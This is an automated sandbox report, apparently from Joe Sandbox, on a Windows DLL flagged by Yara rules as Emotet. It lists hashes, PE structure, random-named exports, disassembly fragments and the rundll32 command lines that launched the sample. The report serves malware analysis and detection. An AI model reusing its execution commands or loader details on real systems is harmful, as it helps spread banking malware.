SHA-512:	0585D70D59C83374AB85F837A35BFA708E46319427C5489F2EE9F6934A68B90ED1DBE16B3124F82405938316F55A212BFEF5B0D47EA4F7026D906F83D59E054B
Malicious:	false
Preview:	regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmFI.9...............................................................................................................................................................................................................................................................................................................................................?...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.3974347454025566
Encrypted:	false
SSDEEP:	192:dxsY2l1RrQAGxRCA8YP5FSEsWftx1bxgoJ4XsaJNSdkyFn6yvRrsf8TWfYjdsiDm:jDz5Rftx1bPJ4Xs7FFn7LTZd1DoXzCS
MD5:	1F2A51FB996D298AAD0AD576423CA175
SHA1:	E1E1446F0AB98723F7302916CE450E6FF6EAD747
SHA-256:	14CDC5B0A0F19BA0B829584F4A3977064BA40D1813776CCFF050F2CD2D0103C3
SHA-512:	24C660244FBDA76CB5D3A0B844D93B2D3FBA8A9B18148F65F8AB5D7B286D47E791CEA0A078EEE359776B8AC8785A7303DF2D28A5116E07C53A7825733D19DF09
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmFI.9...............................................................................................................................................................................................................................................................................................................................................9...HvLE.>......Z...........f\..w..,..3ZNZ.V.........0..............hbin................p.\..,..........nk,....9................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....9....... ........................... .......Z.......................Root........lf......Root....nk ....9....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.970978880732997
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6zAcNlJXo7.dll
File size:	387072
MD5:	c7e23f2764d6ed9b59b0fed69a4488b0
SHA1:	67f31b13485f91be7952b3df5628f14ef1c86a38
SHA256:	d048f196a39fc7dae500b057fa000ebbb81ae2e6c18b4ddff445e8d7163f20ab
SHA512:	1184f739b241155c46fda5c005af5010de100dd50f406965ae39701029a8304810359cc85e589eefc3afa494c3204fb467691b3f0b23c74eb32be26f3a4ca927
SSDEEP:	6144:zBYrPMTsY8GR3j4fubnY6Zs/Bv6yGM6aSTsfA2qL6jpXNcc6CEteuQJPIgtlpZ5L:yhmT4GbnYks/BJGNWo2LjpScDEteuOIi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1001cac1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A73B52 [Wed Dec 1 09:07:30 2021 UTC]
TLS Callbacks:	0x1000c340
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	609402ef170a35cc0e660d7d95ac10ce

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F877CE288C7h
call 00007F877CE28C58h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F877CE28773h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F877CE2916Eh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
jmp 00007F877CE288CFh
push dword ptr [ebp+08h]
call 00007F877CE2CC54h
pop ecx
test eax, eax
je 00007F877CE288D1h
push dword ptr [ebp+08h]
call 00007F877CE2CCD0h
pop ecx
test eax, eax
je 00007F877CE288A8h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F877CE29233h
jmp 00007F877CE29210h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1002A08Ch]
push dword ptr [ebp+08h]
call dword ptr [1002A088h]
push C0000409h
call dword ptr [1002A040h]
push eax
call dword ptr [1002A090h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1002A094h]
test eax, eax
je 00007F877CE288C7h
push 00000002h
pop ecx
int 29h
mov dword ptr [1005E278h], eax
mov dword ptr [1005E274h], ecx
mov dword ptr [1005E270h], edx
mov dword ptr [1005E26Ch], ebx
mov dword ptr [1005E268h], esi
mov dword ptr [1005E264h], edi
mov word ptr [eax], es

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5b590	0x614	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5bba4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0x1bc0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5a1dc	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5a300	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a230	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28bb4	0x28c00	False	0.53924822661	data	6.1540438823	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x32362	0x32400	False	0.817810362251	data	7.40645886779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x1ba4	0x1200	False	0.287109375	data	2.60484752417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x5f000	0x4c4	0x600	False	0.360677083333	AmigaOS bitmap font	2.17228109861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x60000	0x1bc0	0x1c00	False	0.7880859375	data	6.62631718459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer

USER32.dll

GetDC, ReleaseDC, GetWindowRect

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x100010a0
axamexdrqyrgb	2	0x100017b0
bhramccfbdd	3	0x10001690
bptyjtyr	4	0x10001640
bxoqrnuua	5	0x100016c0
cegjceivzmgdcffk	6	0x100014e0
cgxpyqfkocm	7	0x10001480
chjbtsnqmvl	8	0x10001540
crfsijq	9	0x10001730
empxfws	10	0x10001590
fbgcvvbrlowsjsj	11	0x10001550
fjhmprw	12	0x10001660
gfqdajfucnxrv	13	0x10001850
hcloldazhuvj	14	0x10001790
idcumrbybo	15	0x10001500
ihvpwdsfllpvrzy	16	0x10001750
iuzqizpdhxqkmf	17	0x100014c0
jaarlqsruhrwpipt	18	0x100016e0
jndshbhgxdkvvtj	19	0x10001600
jniijdleqsyajeis	20	0x10001650
jtjqgma	21	0x100016f0
kffxtbzhfgbqlu	22	0x10001630
kwxkzdhqe	23	0x100016d0
lidhnvsukgiuabh	24	0x100016b0
ltcrkednwfkup	25	0x10001820
lvrmqgtvhsegpbvmq	26	0x10001770
mxvwvnerswyylp	27	0x10001520
ndlmbjceavqdintmv	28	0x100017d0
nvnriipkwrmxwsu	29	0x10001510
oafxfavxmi	30	0x10001570
ocwutlohg	31	0x100014b0
olcklbdvo	32	0x10001680
pawvqfmiz	33	0x100015e0
pdmomnjmmryopqza	34	0x10001560
plzkvjcbz	35	0x10001710
poasqvltrkgvepng	36	0x10001840
psjoyjhsrkg	37	0x100015b0
qdimtzieldbl	38	0x10001620
qzvngjfyuxpjag	39	0x10001580
relsounb	40	0x100016a0
rykebhcisi	41	0x10001670
snrvgvzpjh	42	0x100017c0
sqnfcfmocgbg	43	0x10001740
sxgllzweihxqxi	44	0x10001760
tgagxhhcfj	45	0x10001780
thjyvtvttwpah	46	0x10001830
uvypobslemtipv	47	0x10001640
vgidwtjsbwpxkdxj	48	0x100017a0
wahhdker	49	0x100014a0
wamqmispvbxt	50	0x100015f0
witvsjavqyw	51	0x10001720
wopabadcwdizvwlgk	52	0x10001490
wpzyecljz	53	0x10001800
wukgfirfwilhu	54	0x100015d0
xntbmrrxs	55	0x100017f0
xsxwxreryufxwuhh	56	0x10001700
xvgdevijtw	57	0x10001610
ydvqidso	58	0x100015c0
yggdjrsewuw	59	0x100015a0
zaeqdmhaky	60	0x100017e0
zakvwkjnk	61	0x10001700
zqbggkzy	62	0x100014f0
zqtdpertk	63	0x100014d0
zshfybkvzv	64	0x10001810
zxxopqyvfoesyhmup	65	0x10001530

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4668 Parent PID: 3744

General

Start time:	20:59:29
Start date:	01/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll"
Imagebase:	0xc80000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.596768757.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.615675303.0000000000B8C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.643045864.0000000000B8C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.597549993.0000000000B8C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.613993965.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.615392489.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.597443170.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.596835233.0000000000B8C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.614123815.0000000000B8C000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6172 Parent PID: 4668

General

Start time:	20:59:29
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6404 Parent PID: 4668

General

Start time:	20:59:30
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.557368858.0000000002D65000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6176 Parent PID: 6172

General

Start time:	20:59:30
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.595689976.000000000060A000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6996 Parent PID: 4668

General

Start time:	20:59:34
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.597386823.00000000008E0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.599282857.0000000002D2A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4248 Parent PID: 4668

General

Start time:	20:59:38
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.598946349.000000000072A000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4884 Parent PID: 572

General

Start time:	21:01:12
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6324 Parent PID: 6176

General

Start time:	21:01:30
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6312 Parent PID: 6404

General

Start time:	21:01:32
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq",YawfQDI
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.699398284.0000000002CCA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6300 Parent PID: 6996

General

Start time:	21:01:38
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5644 Parent PID: 572

General

Start time:	21:01:47
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5344 Parent PID: 4248

General

Start time:	21:01:48
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0x9c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 2824 Parent PID: 5644

General

Start time:	21:01:48
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668
Imagebase:	0xfa0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5544 Parent PID: 4668

General

Start time:	21:01:50
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272
Imagebase:	0xfa0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4820 Parent PID: 572

General

Start time:	21:01:54
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3160 Parent PID: 5644

General

Start time:	21:01:56
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668
Imagebase:	0xfa0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3860 Parent PID: 4668

General

Start time:	21:01:58
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 324
Imagebase:	0xfa0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4668 Parent PID: 3744 loaddll32.exeCOMMON

Executed Functions

Function 00A7ED95, Relevance: 9.1, Strings: 7, Instructions: 364COMMON

Download Yara Rule

Strings

N8^, xrefs: 00A7F29A
?D, xrefs: 00A7F023
c, xrefs: 00A7EE51
vD, xrefs: 00A7EF15
, ;, xrefs: 00A7EF4A
H%R, xrefs: 00A7F35B
?D, xrefs: 00A7F017

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: , ;$H%R$N8^$vD$?D$?D$c
API String ID: 0-926347615
Opcode ID: b175351454650825c56deb7eaf4efdc29f77b930cef76d848f53da75770928a4
Instruction ID: 4c35a74ad5eb53acb634d991c606eed5c4f2c17d06fb0e01da1675d26fc3e0fa
Opcode Fuzzy Hash: b175351454650825c56deb7eaf4efdc29f77b930cef76d848f53da75770928a4
Instruction Fuzzy Hash: B41211B25093809FD368CF25C98AA4BBBF2FBC4718F10891DE1D986260D7B18948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA9C225
GetLastError.KERNEL32 ref: 6EA9C22B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6EA9C247

Strings

asd, xrefs: 6EA9C21C

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 8b0d00c5e0449faabc1130585303ff4c304fa02644702dcaf27c8cf816ff0dfa
Instruction ID: a94f13840e2043d16ffebce7fa90fe22ff41b31ce2324531fe9203978796220e
Opcode Fuzzy Hash: 8b0d00c5e0449faabc1130585303ff4c304fa02644702dcaf27c8cf816ff0dfa
Instruction Fuzzy Hash: EFE1CC71A18B068FCB50CF98C890B2AB7E1FF88704F29456DE8948F345D731E895DB89

Uniqueness

Uniqueness Score: -1.00%

Function 6EA81290, Relevance: 3.9, APIs: 3, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BE96
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BEB4
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BECD
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BECF
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BED6
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BEF4

GetProcessHeap.KERNEL32 ref: 6EA81333
HeapAlloc.KERNEL32(00B70000,00000000,00023800), ref: 6EA8134D
HeapFree.KERNEL32(00000000), ref: 6EA81437

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: 1bf45a60eaf8aa67de0f14661517c0868c9914e86537ddf08c37fa6ed317a686
Instruction ID: 7fee8f7ef4cd48b302f60963a38dd7f735bd21a1515c931f720f1bed34ba855e
Opcode Fuzzy Hash: 1bf45a60eaf8aa67de0f14661517c0868c9914e86537ddf08c37fa6ed317a686
Instruction Fuzzy Hash: 5151B074A10B408BD320CF69C940AA7BBF5FF59314F548A2DE8D68BA51D734F585CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C8DB, Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA9C922
___scrt_uninitialize_crt.LIBCMT ref: 6EA9C93C

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: c4bac712ca7e5ad65e9555a3af6757c2319b0820f7a282f7974726c254794771
Instruction ID: 53e03fc5d8c710d8110b9ef7581aea604785d43ada338220e46ed996fd52fc8c
Opcode Fuzzy Hash: c4bac712ca7e5ad65e9555a3af6757c2319b0820f7a282f7974726c254794771
Instruction Fuzzy Hash: CF41E472E24A25AFEB50CFE4C900BAE7AF9EF45B94F104915E8146F240D7344DC1EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C98B, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

